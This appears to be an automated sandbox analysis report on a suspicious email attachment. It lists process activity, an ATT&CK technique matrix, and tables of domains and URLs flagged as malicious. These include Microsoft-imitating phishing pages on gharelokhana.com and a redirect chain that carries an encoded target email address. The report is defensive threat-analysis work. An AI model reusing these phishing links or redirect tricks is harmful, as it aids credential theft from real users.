            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
            Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise
            Windows Management Instrumentation31
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Process Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory12
            System Information Discovery
            Remote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568924 Sample: SBO Catch up call   pf.msg Startdate: 05/12/2024 Architecture: WINDOWS Score: 84 32 Suricata IDS alerts for network traffic 2->32 34 Antivirus detection for URL or domain 2->34 36 AI detected phishing page 2->36 38 4 other signatures 2->38 7 OUTLOOK.EXE 51 124 2->7         started        process3 file4 18 C:\...\~Outlook Data File - NoEmail.pst.tmp, data 7->18 dropped 20 C:\Users\...\Outlook Data File - NoEmail.pst, Microsoft 7->20 dropped 10 chrome.exe 9 7->10         started        13 ai.exe 7->13         started        process5 dnsIp6 22 192.168.2.4 unknown unknown 10->22 24 239.255.255.250 unknown Reserved 10->24 15 chrome.exe 10->15         started        process7 dnsIp8 26 wwwms.gharelokhana.com 15->26 28 l1ve.gharelokhana.com 15->28 30 12 other IPs or domains 15->30

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico100%Avira URL Cloudmalware
            https://djdjkdlellekkff.gharelokhana.com/5bf3911d69954dcc9f26274a1117b6fd/100%Avira URL Cloudmalware
            https://rpsticket.partnerservices.getmicrosoftkey.com0%Avira URL Cloudsafe
            https://shell.suite.office.com:14430%Avira URL Cloudsafe
            https://cdn.entity.0%Avira URL Cloudsafe
            https://lookup.onenote.com/lookup/geolocation/v10%Avira URL Cloudsafe
            https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js100%Avira URL Cloudmalware
            https://cr.office.com0%Avira URL Cloudsafe
            https://67f9d952-5bf3911d.gharelokhana.com/Prefetch/Prefetch.aspx100%Avira URL Cloudmalware
            https://messagebroker.mobile.m365.svc.cloud.microsoft0%Avira URL Cloudsafe
            https://5088df79-5bf3911d.gharelokhana.com/sbo.co.at/winauth/ssoprobe?client-request-id=8d97587d-1931-4a24-9948-0d928dffd68c&_=1733383491884100%Avira URL Cloudmalware
            https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif100%Avira URL Cloudmalware
            https://res.getmicrosoftkey.com/api/redemptionevents0%Avira URL Cloudsafe
            https://store.office.cn/addinstemplate0%Avira URL Cloudsafe
            https://l1ve.gharelokhana.com/Me.htm?v=3100%Avira URL Cloudmalware
            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0%Avira URL Cloudsafe
            https://82ce8558-5bf3911d.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js100%Avira URL Cloudmalware
            https://api.addins.store.officeppe.com/addinstemplate0%Avira URL Cloudsafe
            https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg100%Avira URL Cloudmalware
            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0%Avira URL Cloudsafe
            http://weather.service.msn.com/data.aspx0%Avira URL Cloudsafe
            https://ncus.contentsync.0%Avira URL Cloudsafe
            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios0%Avira URL Cloudsafe
            https://pushchannel.1drv.ms0%Avira URL Cloudsafe
            https://djdjkdlellekkff.gharelokhana.com/common/instrumentation/dssostatus100%Avira URL Cloudmalware
            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json0%Avira URL Cloudsafe
            https://wus2.contentsync.0%Avira URL Cloudsafe
            https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk20%Avira URL Cloudsafe
            https://devnull.onenote.com0%Avira URL Cloudsafe
            https://visio.uservoice.com/forums/368202-visio-on-devices0%Avira URL Cloudsafe
            https://staging.cortana.ai0%Avira URL Cloudsafe
            https://officepyservice.office.net/0%Avira URL Cloudsafe
            https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory0%Avira URL Cloudsafe
            https://store.office.de/addinstemplate0%Avira URL Cloudsafe
            https://e7a91062-5bf3911d.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js100%Avira URL Cloudmalware
            https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg100%Avira URL Cloudmalware
            https://wus2.pagecontentsync.0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            5088df79-5bf3911d.gharelokhana.com
            164.92.191.86
            truetrue
              unknown
              43042841-5bf3911d.gharelokhana.com
              164.92.191.86
              truetrue
                unknown
                google.dz
                172.217.17.67
                truefalse
                  high
                  www.google.dz
                  216.58.208.227
                  truefalse
                    high
                    djdjkdlellekkff.gharelokhana.com
                    164.92.191.86
                    truefalse
                      high
                      linkprotect.cudasvc.com
                      18.194.24.71
                      truefalse
                        high
                        wwwms.gharelokhana.com
                        164.92.191.86
                        truetrue
                          unknown
                          e7a91062-5bf3911d.gharelokhana.com
                          164.92.191.86
                          truetrue
                            unknown
                            67f9d952-5bf3911d.gharelokhana.com
                            164.92.191.86
                            truetrue
                              unknown
                              www.google.com
                              142.250.181.68
                              truefalse
                                high
                                82ce8558-5bf3911d.gharelokhana.com
                                164.92.191.86
                                truetrue
                                  unknown
                                  alvoradavisual.com.br
                                  191.252.140.51
                                  truefalse
                                    high
                                    l1ve.gharelokhana.com
                                    164.92.191.86
                                    truetrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icotrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9Afalse
                                        high
                                        https://djdjkdlellekkff.gharelokhana.com/5bf3911d69954dcc9f26274a1117b6fd/true
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.jstrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://67f9d952-5bf3911d.gharelokhana.com/Prefetch/Prefetch.aspxtrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://5088df79-5bf3911d.gharelokhana.com/sbo.co.at/winauth/ssoprobe?client-request-id=8d97587d-1931-4a24-9948-0d928dffd68c&_=1733383491884true
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giftrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1false
                                          high
                                          https://l1ve.gharelokhana.com/Me.htm?v=3true
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://82ce8558-5bf3911d.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.jstrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgtrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9Afalse
                                            unknown
                                            https://djdjkdlellekkff.gharelokhana.com/common/instrumentation/dssostatustrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9Afalse
                                              high
                                              https://e7a91062-5bf3911d.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.jstrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9Afalse
                                                unknown
                                                https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgtrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://shell.suite.office.com:14430CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://designerapp.azurewebsites.net0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                  high
                                                  https://autodiscover-s.outlook.com/0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                    high
                                                    https://useraudit.o365auditrealtimeingestion.manage.office.com0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                      high
                                                      https://outlook.office365.com/connectors0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                        high
                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                          high
                                                          https://cdn.entity.0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                            high
                                                            https://rpsticket.partnerservices.getmicrosoftkey.com0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://lookup.onenote.com/lookup/geolocation/v10CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                              high
                                                              https://api.aadrm.com/0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                high
                                                                https://canary.designerapp.0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                  high
                                                                  https://www.yammer.com0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                    high
                                                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                      high
                                                                      https://api.microsoftstream.com/api/0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                        high
                                                                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                          high
                                                                          https://cr.office.com0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://messagebroker.mobile.m365.svc.cloud.microsoft0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://otelrules.svc.static.microsoft0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                            high
                                                                            https://edge.skype.com/registrar/prod0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                              high
                                                                              https://res.getmicrosoftkey.com/api/redemptionevents0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://officeci.azurewebsites.net/api/0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                high
                                                                                https://my.microsoftpersonalcontent.com0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                  high
                                                                                  https://store.office.cn/addinstemplate0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://edge.skype.com/rps0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                    high
                                                                                    https://messaging.engagement.office.com/0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                      high
                                                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.odwebp.svc.ms0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                        high
                                                                                        https://api.powerbi.com/v1.0/myorg/groups0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                          high
                                                                                          https://web.microsoftstream.com/video/0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                            high
                                                                                            https://api.addins.store.officeppe.com/addinstemplate0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://graph.windows.net0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                              high
                                                                                              https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvSBO Catch up call pf.msg, ~WRS{C0DF673B-3183-4731-BD91-7280094AF956}.tmp.1.drfalse
                                                                                                high
                                                                                                https://consent.config.office.com/consentcheckin/v1.0/consents0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                                  high
                                                                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                                    high
                                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://notification.m365.svc.cloud.microsoft/PushNotifications.Register0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drfalse
                                                                                                      high
